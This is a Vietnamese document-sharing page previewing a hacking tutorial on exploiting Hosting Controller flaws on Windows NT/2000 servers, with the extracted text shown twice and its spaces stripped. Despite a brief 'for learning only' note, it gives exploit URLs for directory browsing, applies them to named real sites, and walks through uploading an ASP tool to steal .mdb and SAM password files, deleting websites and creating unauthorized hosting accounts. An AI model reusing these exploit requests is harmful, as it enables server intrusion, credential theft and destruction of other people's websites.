Hack Server NT qua bug Hosting Controller
Số trang: 6
Loại file: doc
Dung lượng: 50.00 KB
Lượt xem: 9
Lượt tải: 0
Xem trước 2 trang đầu tiên của tài liệu này:
Thông tin tài liệu:
Hôm nay tôi sẽ hướng dẫn các bạn cách hack Server và Website qua lỗi Hosting Controller !Như các bạn đã thấy hiện giờ đã xuất hiện rất nhiều máy chủ trên thế giới (theo tôi kiểm tra và thử nghiệm trên 12 server hiện giờ vẫn chưa sửa lỗi này) bị lỗi Hostingcontroller.Chú ý : Tôi viết bài này chỉ để các bạn học hỏi. Nếu có Hack thì chỉ nên thêm 1 file vào trong website để chứng tỏ là mình đã Hack. Không nên phá hoại làm ảnh hưởng đến nhiều người ....
Nội dung trích xuất từ tài liệu:
Hack Server NT qua bug Hosting ControllerHackServerNTquabugHostingControllertrangnàyđãđượcđọc lầnHômnaytôisẽhướngdẫncácbạncáchhackServervàWebsitequalỗiHostingController!Nhưcácbạnđãthấyhiệngiờđãxuấthiệnrấtnhiềumáychủtrênthếgiới(theotôikiểmtravàthửnghiệmtrên12serverhiệngiờvẫnchưasửalỗinày)bịlỗiHostingcontroller.Chúý:Tôiviếtbàinàychỉđểcácbạnhọchỏi.NếucóHackthìchỉnênthêm1filevàotrongwebsiteđểchứngtỏlàmìnhđãHack.Khôngnênpháhoạilàmảnhhưởngđếnnhiềungười.+LỗiHClàlỗicủaphầnmềmHostingControllerdùngđểquảnlýServercungcấpDomainvàHostingchokháchhàngthườngđượcchạydướiWin2000/NT.TôisẽHackqualỗiHCvàsẽvídụvới1serverchưafixđólàserverchứa38sitemàđãđượcHackerForumHackedvàothángtrước.+LỗiHCchobạnthựchiện1dònglệnhđểđọcổcứng(C;D;E)thậmchícảổAcủaserverqua1sitehoặctrựctiếpbằngIDcủaserver.LỗiHCthựcchấtlàbịlỗicủa4filenằmtrongphầnmềmlà:statsbrowse.asp;servubrowse.asp;browsedisk.asp;browsewebalizerexe.asp; sqlbrowse.aspTôisẽviếtcấutrúccủalệnhHackvàoservernhờlỗi4filenày:..................TrongđóHCcóthểlà:admin;advadmin;hostingcontrollerLỗiđầutiêntôigiớithiệuvớicácbạncótênMultiplesecurityvulnerabilities.ĐâylàcácđoạnScriptchophépbạnduyệtbấtcứfilenàotrênServer:http://www.victim.com/advwebadmin/stats/statsbrowse.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/serv_u/servubrowse.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/adminsettings/browsedisk.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/adminsettings/browsewebalizerexe.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/SQLServ/sqlbrowse.asp?filepath=c:&Opt=3TrongđóVictimlàServerbịlỗiHCmàbạnmuốnHackVídụ:cáchHackserverqua1sitenằmtrongserver(haycòngọilàHacklocalexploit)VD:sitenàyđãbịHackerForumhack:http://123hollywood.com/hf.htmởthanhAddressbạnđánh1trongcácdònglệnhsau:http://123hollywood.com/admin/stats/statsbrowse.asp?filepath=c:&Opt=3http://123hollywood.com/admin/serv_u/servubrowse.asp?filepath=c:&Opt=3http://123hollywood.com/admin/adminsettings/browsedisk.asp?filepath=c:&Opt=3http://123hollywood.com/admin/adminsettings/browsewebalizerexe.asp?filepath=c:&Opt=3http://123hollywood.com/admin/SQLServ/sqlbrowse.asp?filepath=c:&Opt=3LúcnầybạnsẽvàođượcphầnBrowserDirectories.ĐâylàtoànbộcấutrúccủaWebsiteđó.KhicácbạnđãvàođượcbêntrongcủaổC:ạnthấycóthưmụcwebsites(đốivớiserverđangthửnghiệmnày,cònđốivớicácserverkhácthìnóthườngnằmởổD:).NếubạnđãthấythìOK.Bạnhãyvàotrongvàthấy1loạtcácwebsite.VớiserverchúngtađangHackởtrênbạnsẽthấycácwebsiteđượcđưavàocácthưmụcriênglẻtheovần.ChúngtahãytìmtớiwebsitemànhờnóchúngtavàođượcServernày.Bạnhãyvào123web/123kinh/123hollywood.com/www/.Bạnthấyđócựckỳđơngiảnđúngkhông.SaukhibiếtđượcđườngdẫncủasitecầnHackthìbạndùngScriptsau:http://www.example.com/advwebadmin/folders/filemanager.asp&siteindex=testing&sitename=testing.com&OpenPath=C:webspace esadmin esting esting.comwww.......... ThayexamplebằngtêncủaServervàtestingbằngtêntrangWebmuốnHackVídụ:BạnđăngkýWebsitetêncuonglongcủaFPTthìtụiFPTsẽchobạnmộtnơiđểtrangWeb:c:webspace esadmincuonglongcuonglong.comwww MuốnHacktrangnàythìbạnđánhScriptnhưtrên:http://www.ftp.com/advwebadmin/folders/filemanager.asp&siteindex=cuonglong&sitename=cuonglong.com&OpenPath=C:webspace esadmincuonglongcuonglong.comwww.......... VậylàbạnđãvàođượccấutrúcthưmụccủaWebđónhưnglúcnàybạnchỉquyềnupload1filenàođótừổcứngcủabạnlênsiteđóthôiSauđóbạnuploadfilentdaddy.aspWebsiteđó.VàchạyfilenàytrênWebsiteđóđểlấynhữngfile*.mdbvà*.SAMvề,đâylàfilechứapassword,bạnchỉviệcgiảimãraVậylàbạnđãHackđượcWebsiteđórồiBâygiờtôisẽhướngdẫncácbạncáchuploadvàxoáfiletrêncácsitenày:Cáinàythìcũngcựckỳđơngiản,bạnhãyxemmẫusau:http://www.eg.com/hc/folders/filemanager.asp&siteindex=testing&sitename=testing.com&OpenPath=C:/webspace/.. rongđótestinglàcácđườngdẫnvàowebsitemàbạnmuốnupload.Bâygiờthìbạncóthểnghịchthoảimái;Bạncóthểchotoànbộwebsitecủahọchếtngaytạichỗ.Còn1vàilỗinữacủaHC,trongđócólỗichophépbạncókhảnăngkhởitạochomình1hostingtrongservernhờdònglệnhsau:http://victim.com/admin/autosignup/dsp_newwebadmin.aspCũngnhưtrên,VictimlàServerbịlỗiHCmàbạnmuốnHack.VídụđólàWebsitehttp://bigguy.ourweb.net/http://bigguy.ourweb.net/AdvAdmin/autosignup/dsp_newwebadmin.aspMìnhđãkhởitạocáinày,cácbạnvôxem ...
Nội dung trích xuất từ tài liệu:
Hack Server NT qua bug Hosting ControllerHackServerNTquabugHostingControllertrangnàyđãđượcđọc lầnHômnaytôisẽhướngdẫncácbạncáchhackServervàWebsitequalỗiHostingController!Nhưcácbạnđãthấyhiệngiờđãxuấthiệnrấtnhiềumáychủtrênthếgiới(theotôikiểmtravàthửnghiệmtrên12serverhiệngiờvẫnchưasửalỗinày)bịlỗiHostingcontroller.Chúý:Tôiviếtbàinàychỉđểcácbạnhọchỏi.NếucóHackthìchỉnênthêm1filevàotrongwebsiteđểchứngtỏlàmìnhđãHack.Khôngnênpháhoạilàmảnhhưởngđếnnhiềungười.+LỗiHClàlỗicủaphầnmềmHostingControllerdùngđểquảnlýServercungcấpDomainvàHostingchokháchhàngthườngđượcchạydướiWin2000/NT.TôisẽHackqualỗiHCvàsẽvídụvới1serverchưafixđólàserverchứa38sitemàđãđượcHackerForumHackedvàothángtrước.+LỗiHCchobạnthựchiện1dònglệnhđểđọcổcứng(C;D;E)thậmchícảổAcủaserverqua1sitehoặctrựctiếpbằngIDcủaserver.LỗiHCthựcchấtlàbịlỗicủa4filenằmtrongphầnmềmlà:statsbrowse.asp;servubrowse.asp;browsedisk.asp;browsewebalizerexe.asp; sqlbrowse.aspTôisẽviếtcấutrúccủalệnhHackvàoservernhờlỗi4filenày:..................TrongđóHCcóthểlà:admin;advadmin;hostingcontrollerLỗiđầutiêntôigiớithiệuvớicácbạncótênMultiplesecurityvulnerabilities.ĐâylàcácđoạnScriptchophépbạnduyệtbấtcứfilenàotrênServer:http://www.victim.com/advwebadmin/stats/statsbrowse.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/serv_u/servubrowse.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/adminsettings/browsedisk.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/adminsettings/browsewebalizerexe.asp?filepath=c:&Opt=3http://www.victim.com/advwedadmin/SQLServ/sqlbrowse.asp?filepath=c:&Opt=3TrongđóVictimlàServerbịlỗiHCmàbạnmuốnHackVídụ:cáchHackserverqua1sitenằmtrongserver(haycòngọilàHacklocalexploit)VD:sitenàyđãbịHackerForumhack:http://123hollywood.com/hf.htmởthanhAddressbạnđánh1trongcácdònglệnhsau:http://123hollywood.com/admin/stats/statsbrowse.asp?filepath=c:&Opt=3http://123hollywood.com/admin/serv_u/servubrowse.asp?filepath=c:&Opt=3http://123hollywood.com/admin/adminsettings/browsedisk.asp?filepath=c:&Opt=3http://123hollywood.com/admin/adminsettings/browsewebalizerexe.asp?filepath=c:&Opt=3http://123hollywood.com/admin/SQLServ/sqlbrowse.asp?filepath=c:&Opt=3LúcnầybạnsẽvàođượcphầnBrowserDirectories.ĐâylàtoànbộcấutrúccủaWebsiteđó.KhicácbạnđãvàođượcbêntrongcủaổC:ạnthấycóthưmụcwebsites(đốivớiserverđangthửnghiệmnày,cònđốivớicácserverkhácthìnóthườngnằmởổD:).NếubạnđãthấythìOK.Bạnhãyvàotrongvàthấy1loạtcácwebsite.VớiserverchúngtađangHackởtrênbạnsẽthấycácwebsiteđượcđưavàocácthưmụcriênglẻtheovần.ChúngtahãytìmtớiwebsitemànhờnóchúngtavàođượcServernày.Bạnhãyvào123web/123kinh/123hollywood.com/www/.Bạnthấyđócựckỳđơngiảnđúngkhông.SaukhibiếtđượcđườngdẫncủasitecầnHackthìbạndùngScriptsau:http://www.example.com/advwebadmin/folders/filemanager.asp&siteindex=testing&sitename=testing.com&OpenPath=C:webspace esadmin esting esting.comwww.......... ThayexamplebằngtêncủaServervàtestingbằngtêntrangWebmuốnHackVídụ:BạnđăngkýWebsitetêncuonglongcủaFPTthìtụiFPTsẽchobạnmộtnơiđểtrangWeb:c:webspace esadmincuonglongcuonglong.comwww MuốnHacktrangnàythìbạnđánhScriptnhưtrên:http://www.ftp.com/advwebadmin/folders/filemanager.asp&siteindex=cuonglong&sitename=cuonglong.com&OpenPath=C:webspace esadmincuonglongcuonglong.comwww.......... VậylàbạnđãvàođượccấutrúcthưmụccủaWebđónhưnglúcnàybạnchỉquyềnupload1filenàođótừổcứngcủabạnlênsiteđóthôiSauđóbạnuploadfilentdaddy.aspWebsiteđó.VàchạyfilenàytrênWebsiteđóđểlấynhữngfile*.mdbvà*.SAMvề,đâylàfilechứapassword,bạnchỉviệcgiảimãraVậylàbạnđãHackđượcWebsiteđórồiBâygiờtôisẽhướngdẫncácbạncáchuploadvàxoáfiletrêncácsitenày:Cáinàythìcũngcựckỳđơngiản,bạnhãyxemmẫusau:http://www.eg.com/hc/folders/filemanager.asp&siteindex=testing&sitename=testing.com&OpenPath=C:/webspace/.. rongđótestinglàcácđườngdẫnvàowebsitemàbạnmuốnupload.Bâygiờthìbạncóthểnghịchthoảimái;Bạncóthểchotoànbộwebsitecủahọchếtngaytạichỗ.Còn1vàilỗinữacủaHC,trongđócólỗichophépbạncókhảnăngkhởitạochomình1hostingtrongservernhờdònglệnhsau:http://victim.com/admin/autosignup/dsp_newwebadmin.aspCũngnhưtrên,VictimlàServerbịlỗiHCmàbạnmuốnHack.VídụđólàWebsitehttp://bigguy.ourweb.net/http://bigguy.ourweb.net/AdvAdmin/autosignup/dsp_newwebadmin.aspMìnhđãkhởitạocáinày,cácbạnvôxem ...
Tìm kiếm theo từ khóa liên quan:
mẹo sử dụng máy tính khắc phục sự cố máy tính cách sửa lỗi máy tính thủ thuật máy tính an ninh mGợi ý tài liệu liên quan:
-
Top 10 mẹo 'đơn giản nhưng hữu ích' trong nhiếp ảnh
11 trang 317 0 0 -
Làm việc với Read Only Domain Controllers
20 trang 305 0 0 -
Phương pháp bảo vệ và khác phục sự cố máy tính: Phần 2
99 trang 215 0 0 -
Sửa lỗi các chức năng quan trọng của Win với ReEnable 2.0 Portable Edition
5 trang 214 0 0 -
Giáo trình Bảo trì hệ thống và cài đặt phần mềm
68 trang 208 0 0 -
Tổng hợp 30 lỗi thương gặp cho những bạn mới sử dụng máy tính
9 trang 205 0 0 -
Phần III: Xử lý sự cố Màn hình xanh
3 trang 204 0 0 -
UltraISO chương trình ghi đĩa, tạo ổ đĩa ảo nhỏ gọn
10 trang 204 0 0 -
Hướng dẫn cách khắc phục lỗi màn hình xanh trong windows
7 trang 202 0 0 -
Sao lưu dữ liệu Gmail sử dụng chế độ Offline
8 trang 201 0 0